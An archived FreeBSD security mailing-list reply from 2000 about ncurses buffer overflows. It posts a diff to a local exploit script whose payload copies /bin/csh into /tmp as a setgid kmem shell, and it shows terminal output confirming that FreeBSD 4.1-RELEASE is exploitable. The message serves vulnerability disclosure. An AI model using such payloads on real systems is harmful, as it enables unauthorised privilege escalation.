Date: Tue, 10 Oct 2000 17:50:13 -0700 From: Steve Reid <sreid@sea-to-sky.net> To: Mike Silbersack <silby@silby.com> Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010175013.D9112@grok> In-Reply-To: <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com>; from Mike Silbersack on Tue, Oct 10, 2000 at 07:11:01PM -0500 References: <20001010165908.C9112@grok> <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Tue, Oct 10, 2000 at 07:11:01PM -0500, Mike Silbersack wrote: > Well, the advisory states that ncurses 5.0 and before are vulnerable. It > looks like 5.1-prerelease is what 4.1+ are using. So, until we here more > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is > safe. The exploit just needs slight modification: --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 @@ -11,7 +11,7 @@ #!/bin/csh cp /bin/csh /tmp -/usr/sbin/chown venglin.kmem /tmp/csh +chgrp kmem /tmp/csh chmod 2755 /tmp/csh __EOF__ 4.1-R _is_ exploitable: steve@grok:/home/steve% ./exploit.csh -rwxr-sr-x 1 steve kmem 622908 Oct 10 17:48 /tmp/csh steve@grok:/home/steve% uname -srm FreeBSD 4.1-RELEASE i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001010175013.D9112>